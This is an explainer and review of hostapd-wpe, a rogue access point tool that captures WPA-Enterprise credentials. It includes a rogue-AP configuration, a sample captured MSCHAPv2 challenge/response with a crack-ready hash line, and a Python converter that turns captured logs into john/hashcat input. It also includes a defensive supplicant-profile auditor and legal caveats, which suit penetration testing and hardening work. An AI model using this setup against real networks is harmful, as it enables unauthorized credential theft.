
Hostapd-WPE: How Rogue Access Points Harvest Enterprise WiFi Credentials


Hook

Every time a smartphone automatically connects to a familiar WiFi network name, it may hand its enterprise credentials to whoever is answering to that name. Hostapd-WPE weaponizes this trust.

Context

WPA-Enterprise networks, ubiquitous in corporate environments, universities, and government facilities, rely on 802.1X authentication to verify users before granting network access. Unlike WPA-PSK (pre-shared key) networks where everyone shares the same password, WPA-Enterprise uses individual credentials, typically a username and password, validated through the Extensible Authentication Protocol (EAP). The security model assumes clients will validate the authentication server's certificate, which is what prevents a man-in-the-middle from posing as that server. In practice, many devices ship with lax certificate validation (no CA or expected server name pinned to the network profile), and users habitually click through security warnings.

Hostapd-WPE emerged from this security gap. Built by Brad Antoniewicz at Open Security Research as a patch against the standard hostapd daemon (the de facto Linux software for creating WiFi access points), it transforms a legitimate AP tool into a credential harvesting platform. The "WPE" suffix stands for "Wireless Pwnage Edition," reflecting its offensive security purpose. By impersonating both the access point and the RADIUS authentication server, hostapd-wpe terminates the EAP handshake itself, recording the authentication challenges and responses so they can be cracked offline. This tool exposed a fundamental weakness: when clients don't properly validate server certificates, the entire 802.1X security model collapses into a credential theft opportunity.

Technical Insight

System architecture (auto-generated diagram, summarized): a Wi-Fi client looking for a WPA-Enterprise SSID talks to the rogue AP (hostapd-wpe), which runs an integrated EAP/RADIUS server. That server terminates the outer TLS tunnel with a rogue certificate; an inner-auth handler with an MSCHAPv2 interceptor passes challenge/response pairs to a credential logger, which writes them to disk. Message flow: probe request, fake beacon, association request, EAP-Identity request/response, TLS handshake (self-signed cert), accept + inner auth, challenge/response, credential extraction in hashcat/john format, EAP-Success.

The architecture of hostapd-wpe centers on intercepting EAP authentication flows at the most vulnerable point: the inner authentication tunnel. WPA-Enterprise typically uses tunneled EAP methods like PEAP (Protected EAP) or EAP-TTLS (EAP Tunneled Transport Layer Security). These protocols establish an outer TLS tunnel, then perform authentication inside that tunnel using inner methods like MSCHAPv2. The outer tunnel should protect credentials from eavesdropping, but only if the client validates the server's certificate. Hostapd-WPE exploits certificate validation failures by presenting a self-signed certificate and capturing whatever credentials the trusting client sends.

The core modification to hostapd occurs in the EAP server implementation. The patched code intercepts EAP-MSCHAP-V2 challenge-response exchanges and writes them to disk in formats optimized for password cracking. When a client connects, hostapd-wpe completes the TLS handshake with its rogue certificate, then the client proceeds to authenticate. Here's what a typical configuration file looks like:

interface=wlan0
driver=nl80211
ssid=CorpNetwork
channel=6
hw_mode=g

# WPA-Enterprise configuration
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP

# Integrated RADIUS server
ieee8021x=1
eap_server=1
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/certs/ca.pem
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key

# Credential logging
wpe_logfile=/var/log/hostapd-wpe.log

The eap_user_file contains wildcard entries that accept any username, effectively telling hostapd to authenticate everyone regardless of credentials. This keeps clients connected and prevents suspicion. The EAP server module, instead of rejecting invalid credentials, logs the challenge-response pairs and returns EAP-Success.

The captured credentials appear in formats ready for cracking tools. For MSCHAPv2, hostapd-wpe logs both the 8-byte challenge and the 24-byte response, together with a line in John the Ripper's NETNTLM format (the same challenge/response pair is what hashcat mode 5500 consumes):

mschapv2: Wed Apr 15 14:32:18 2016
 username: jdoe
 challenge: 8a:c3:77:92:b5:4e:1d:9f
 response: 4f:7a:8e:6c:9b:2d:3e:5a:1c:8d:7e:9f:0a:3b:6c:4d:5e:8f:9a:0b:1c:2d:3e:4f
john output:
jdoe:$NETNTLM$8ac37792b54e1d9f$4f7a8e6c9b2d3e5a1c8d7e9f0a3b6c4d5e8f9a0b1c2d3e4f

This hash can be attacked offline with GPU-accelerated tools. The MSCHAPv2 response is three DES encryptions of the 8-byte challenge under keys derived from the NT hash (MD4 of the UTF-16LE password), so the secret actually being recovered is the 16-byte NT hash; because the third DES key carries only two bytes of that hash, the whole response falls to at most 2^56 DES operations regardless of password complexity (Marlinspike and Hulton, 2012). For typical passwords, a dictionary or rules attack on hashcat mode 5500 finishes far sooner. The attack's appeal is that nothing on the client is exploited: after setup, hostapd-wpe simply waits for clients to connect and authenticate.
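To make the log-to-hash step concrete, here is an added Python example (my own, not code from hostapd-wpe or from this article) that parses entries of the shape shown above, checks that each challenge is 8 bytes and each response 24 bytes, and renders the john `$NETNTLM$` line and the `user::domain::response:challenge` line used with hashcat mode 5500. It also derives the 8-byte challenge the way RFC 2759 section 8.2 defines it (SHA-1 over peer challenge, authenticator challenge and username, truncated to 8 bytes), checked against the RFC's own test vector, to show why only eight challenge bytes appear in the log. The log text is constructed; the hashcat field layout is assumed from common usage, so check it against your hashcat version.

```python
import hashlib
import re

# Constructed sample in the shape of the hostapd-wpe log excerpt above.
# Values are illustrative; the second entry is deliberately truncated.
SAMPLE_LOG = """\
mschapv2: Wed Apr 15 14:32:18 2016
 username: jdoe
 challenge: 8a:c3:77:92:b5:4e:1d:9f
 response: 4f:7a:8e:6c:9b:2d:3e:5a:1c:8d:7e:9f:0a:3b:6c:4d:5e:8f:9a:0b:1c:2d:3e:4f
mschapv2: Wed Apr 15 14:35:02 2016
 username: CORP\\asmith
 challenge: 01:02:03:04:05:06:07:08
 response: 00:11:22
"""

ENTRY_RE = re.compile(
    r"^mschapv2:[ \t]*(?P<ts>.+)\n"
    r"[ \t]*username:[ \t]*(?P<user>\S+)\n"
    r"[ \t]*challenge:[ \t]*(?P<chal>[0-9a-fA-F:]+)\n"
    r"[ \t]*response:[ \t]*(?P<resp>[0-9a-fA-F:]+)",
    re.MULTILINE,
)


def _colon_hex(s: str) -> bytes:
    """Decode 'aa:bb:cc' style hex; return b'' on malformed input."""
    try:
        return bytes.fromhex(s.replace(":", ""))
    except ValueError:
        return b""


def parse_wpe_log(text: str) -> list:
    """One dict per mschapv2 entry; 'ok' is False when the challenge is not
    8 bytes or the response is not 24 bytes (truncated or corrupted log)."""
    entries = []
    for m in ENTRY_RE.finditer(text):
        chal, resp = _colon_hex(m["chal"]), _colon_hex(m["resp"])
        user, domain = m["user"], ""
        if "\\" in user:  # DOMAIN\user as some Windows supplicants send it
            domain, user = user.split("\\", 1)
        entries.append({
            "user": user, "domain": domain, "timestamp": m["ts"].strip(),
            "challenge": chal, "response": resp,
            "ok": len(chal) == 8 and len(resp) == 24,
        })
    return entries


def to_john(e: dict) -> str:
    """John the Ripper netntlm line: user:$NETNTLM$<challenge>$<response>."""
    return f"{e['user']}:$NETNTLM${e['challenge'].hex()}${e['response'].hex()}"


def to_hashcat(e: dict) -> str:
    """hashcat -m 5500 line: user::domain:<lm>:<nt>:<challenge> with the LM
    field left empty (assumed layout, as commonly used for MSCHAPv2 captures)."""
    return f"{e['user']}::{e['domain']}::{e['response'].hex()}:{e['challenge'].hex()}"


def convert(text: str, fmt: str = "john") -> list:
    """All well-formed entries rendered in the requested cracker format."""
    render = to_john if fmt == "john" else to_hashcat
    return [render(e) for e in parse_wpe_log(text) if e["ok"]]


def mschapv2_challenge_hash(peer: bytes, auth: bytes, username: bytes) -> bytes:
    """RFC 2759 s.8.2 ChallengeHash: first 8 bytes of
    SHA1(PeerChallenge || AuthenticatorChallenge || UserName).
    This is the 8-byte 'challenge' that ends up in the NETNTLM line."""
    return hashlib.sha1(peer + auth + username).digest()[:8]


if __name__ == "__main__":
    for line in convert(SAMPLE_LOG) + convert(SAMPLE_LOG, "hashcat"):
        print(line)
    # RFC 2759 section 9.2 test vector; expected challenge d02e4386bce91226
    peer = bytes.fromhex("21402324255E262A28295F2B3A337C7E")
    auth = bytes.fromhex("5B5D7C7D7B3F2F3E3C2C602132262628")
    print(mschapv2_challenge_hash(peer, auth, b"User").hex())
```

Note that the script only rewrites what the log already contains; the DES work of testing candidate passwords against the pair is what hashcat or john does, and the truncated second entry is dropped rather than emitted as a line the cracker would reject.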

The tool also implements Karma attack functionality, responding to probe requests from clients searching for known networks. When a device walks around broadcasting "Have you seen my network 'CorpNetwork'?" hostapd-wpe can respond "Yes, I am CorpNetwork!" regardless of its configured SSID. This dramatically increases the attack surface by capturing opportunistic connections from devices with saved network profiles.

The Heartbleed integration is particularly devious. For clients vulnerable to CVE-2014-0160, hostapd-wpe can exploit the OpenSSL memory leak during the TLS handshake, potentially extracting credentials or session keys directly from client memory before authentication even occurs. While Heartbleed is largely patched in 2024, legacy devices and embedded systems remain vulnerable.

Gotcha

The most critical limitation is obsolescence. Hostapd-WPE is based on hostapd 2.6, released in 2016, and eight years is an eternity in security tooling. Modern Linux wireless drivers, kernel updates, and EAP implementations may behave unexpectedly with this aging codebase; compilation often requires hunting down specific library versions, and support for contemporary chipsets is hit-or-miss. More to the point, the attack depends on the client, not on the real authentication server, which the rogue AP replaces entirely. A supplicant profile that pins the RADIUS server's CA and expected server name, or that uses a method with no password to harvest, such as EAP-TLS (mutual certificates) or EAP-PWD (a password-authenticated key exchange that resists offline dictionary attack), will not give hostapd-wpe anything useful.
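What "pinning the CA and server name" means for a Linux supplicant is concrete: the network profile must carry a ca_cert and a domain_match (or similar) entry, and for PEAP/TTLS an anonymous_identity so the real username is not sent in the clear outer identity. The following added Python example (mine, not part of hostapd-wpe or eaphammer) audits a constructed wpa_supplicant.conf containing one weak and one hardened CorpNetwork profile plus a PSK network. The option names are real wpa_supplicant options; the SSID, paths, identities and server name are made up.

```python
import re

# Constructed wpa_supplicant.conf excerpt. The first CorpNetwork profile is the
# weak configuration that a rogue AP exploits (no server certificate validation);
# the second is the hardened version; the third is an unrelated PSK network.
SAMPLE_CONF = """\
ctrl_interface=/run/wpa_supplicant

network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="CorpNetwork"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    anonymous_identity="anonymous"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="HomeWifi"
    key_mgmt=WPA-PSK
    psk="correct horse battery staple"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.DOTALL)

# Options that bind the profile to a CA, and options that bind it to a server name.
CA_KEYS = ("ca_cert", "ca_path")
NAME_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")
TUNNELED = ("PEAP", "TTLS", "FAST")


def parse_networks(conf: str) -> list:
    """Return each network={...} block as a dict of option -> value (quotes stripped)."""
    nets = []
    for body in BLOCK_RE.findall(conf):
        net = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            net[key.strip()] = value.strip().strip('"')
        nets.append(net)
    return nets


def audit_network(net: dict) -> list:
    """Findings that make an 802.1X profile harvestable by a rogue AP."""
    key_mgmt = net.get("key_mgmt", "")
    if "WPA-EAP" not in key_mgmt and "IEEE8021X" not in key_mgmt:
        return []  # PSK or open network: no EAP credentials to capture this way
    findings = []
    if not any(k in net for k in CA_KEYS):
        findings.append("no ca_cert/ca_path: any server certificate, including a self-signed one, is accepted")
    if not any(k in net for k in NAME_KEYS):
        findings.append("no domain_match or equivalent: any certificate chaining to the CA passes, not only the RADIUS server's")
    if net.get("eap") in TUNNELED and "anonymous_identity" not in net:
        findings.append("no anonymous_identity: the real username is sent in the clear outer EAP-Identity response")
    return findings


def audit(conf: str) -> list:
    """List of (ssid, findings) for every network block in the config."""
    return [(net.get("ssid", "?"), audit_network(net)) for net in parse_networks(conf)]


if __name__ == "__main__":
    for ssid, findings in audit(SAMPLE_CONF):
        status = "OK" if not findings else "WEAK"
        print(f"{ssid}: {status}")
        for f in findings:
            print(f"  - {f}")
```

The check is deliberately about the client profile: the real RADIUS server's configuration is irrelevant to a rogue AP that never contacts it, so this is where the fix has to land, whether it is pushed as a wpa_supplicant profile, a Windows GPO, or an MDM Wi-Fi payload.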

The legal and ethical constraints cannot be overstated. Using hostapd-wpe without explicit written authorization is illegal in most jurisdictions; in the United States it can implicate computer intrusion, wiretap, and fraud statutes. Even in authorized penetration tests, the scope must be precisely defined. Creating a rogue access point in a dense office building might inadvertently capture credentials from neighboring organizations, expanding your attack beyond the authorized scope and creating massive liability. The tool generates evidence of credential compromise that must be handled with extreme care: log files containing usernames and challenge/response pairs are sensitive security data requiring encryption at rest and strict access controls. Physical proximity requirements also limit applicability; you need to be within wireless range of target clients, which may require physical presence in secured facilities.

Verdict

Use if: You're conducting authorized wireless penetration tests against WPA-Enterprise networks and need to assess client certificate validation behavior, credential security, and susceptibility to rogue AP attacks. It's valuable for red team engagements specifically testing 802.1X implementations in environments where you have explicit written permission and controlled scope. Also useful for security awareness training: demonstrating a live credential harvest drives home the importance of certificate validation in ways theoretical discussions never will.

Skip if: You need a maintained, modern solution (eaphammer is the spiritual successor with active development), aren't performing authorized security assessments with proper legal coverage, or need to test against contemporary EAP implementations and security controls. Also skip if you lack experience with wireless security fundamentals; this tool's effectiveness depends on understanding EAP protocols, certificate validation, and wireless networking at a deep level. The combination of age, legal risk, and specialization makes hostapd-wpe a narrow-purpose tool for experienced security professionals only.
